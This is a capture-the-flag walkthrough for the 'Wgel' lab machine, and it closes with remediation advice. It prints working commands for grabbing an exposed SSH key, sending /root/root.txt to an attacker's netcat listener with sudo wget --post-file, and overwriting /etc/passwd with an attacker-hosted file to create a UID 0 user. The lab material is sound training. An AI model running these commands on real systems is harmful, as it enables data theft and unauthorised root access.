Target IP: wgel.thm (Requires /etc/hosts entry) Difficulty: Easy Objective: User (jessie) & Root (root.txt)

1. Executive Summary

“Wgel CTF” is a Linux machine that exposes its SSH keys via a misconfigured web server directory. Initial access is obtained by fuzzing the web server, locating a hidden .ssh directory, and downloading the private key for the user jessie. Privilege escalation is achieved by exploiting a misconfiguration in sudoers that allows jessie to run wget as root. This is leveraged to overwrite the /etc/passwd file, creating a new root user or simply exfiltrating the root flag.

Key TTPs (MITRE ATT&CK):

  • T1595 (Active Scanning): Directory Fuzzing.
  • T1552.003 (Unsecured Credentials: Bash History/Config): Exposed .ssh/id_rsa on web server.
  • T1548.003 (Sudo and Sudo Caching): Exploiting sudo wget (GTFOBins).
  • T1003 (OS Credential Dumping): Modifying /etc/passwd for persistence.

2. Operational Setup

Host Configuration

echo "10.201.13.97 wgel.thm" | sudo tee -a /etc/hosts

3. Enumeration

A. Network Scanning

Nmap identifies the standard entry points:

  • 22/tcp (SSH): OpenSSH 7.2p2.
  • 80/tcp (HTTP): Apache Default Page.

B. Web Enumeration

You performed directory fuzzing (likely with gobuster or ffuf).

  • Initial find: /sitemap directory.
  • Recursive Fuzzing: Inside /sitemap, you found the crown jewel.
  • Critical Finding: http://wgel.thm/sitemap/.ssh/id_rsa

This is a critical misconfiguration. The web server root was likely set to a user’s home directory or a backup folder containing the .ssh keys.


4. Initial Access: The Stolen Key

A. Preparation

We download the key and prepare it for use. SSH requires private keys to have strict permissions (read/write by owner only).

wget http://wgel.thm/sitemap/.ssh/id_rsa
chmod 600 id_rsa

B. Login

We guess the username is jessie based on the room description or filename clues (sometimes the pub key comment says jessie@wgel).

ssh -i id_rsa jessie@wgel.thm

User Flag: Located in jessie’s home directory.


5. Privilege Escalation: Sudo Wget

A. Enumeration

We check for sudo privileges immediately.

sudo -l

Output:

User jessie may run the following commands on wgel:
    (root) NOPASSWD: /usr/bin/wget

B. The Exploit (GTFOBins)

wget is a file download utility. If run as root, it can write files anywhere on the filesystem (-O flag) or read files and send them to a remote server (--post-file).

You have two main paths to Root here:

Path 1: The Exfiltration (Reading the Flag)

If you just want the flag without a shell:

  1. Attacker: Start a listener (nc -lvnp 4444).
  2. Victim:
sudo /usr/bin/wget --post-file=/root/root.txt http://10.10.YOUR.IP:4444
  1. Result: The contents of root.txt appear in your netcat listener.

Path 2: The Overwrite (Getting a Root Shell)

To get a full shell, we can overwrite /etc/passwd to add a new root user.

  1. Generate Password Hash:
openssl passwd -1 -salt evil password123
# Output: $1$evil$vM0w... (Example hash)
  1. Create Malicious Passwd File: Copy the target’s current /etc/passwd to your machine. Add a new line at the bottom:
hacker:$1$evil$vM0w...:0:0:root:/root:/bin/bash

(Note: UID 0 and GID 0 make this user root). 3. Host the File:

python3 -m http.server 80
  1. Overwrite on Target:
sudo /usr/bin/wget http://10.10.YOUR.IP/passwd -O /etc/passwd
  1. Login:
su hacker
# Password: password123

Result: root shell.

Root Flag: /root/root.txt.


6. Remediation (Blue Team)

  1. Web Server Configuration:
  • Never set the web root to a user’s home directory.
  • Explicitly deny access to dot-files and directories (.ssh, .bash_history, .git) in the Apache configuration (.htaccess or httpd.conf).
  1. Sudo Configuration:
  • Do not grant NOPASSWD sudo rights to wget, curl, or any tool that allows arbitrary file writes.
  • If wget is needed for a specific script, restrict the sudo rule to execute only that specific script, not the binary itself.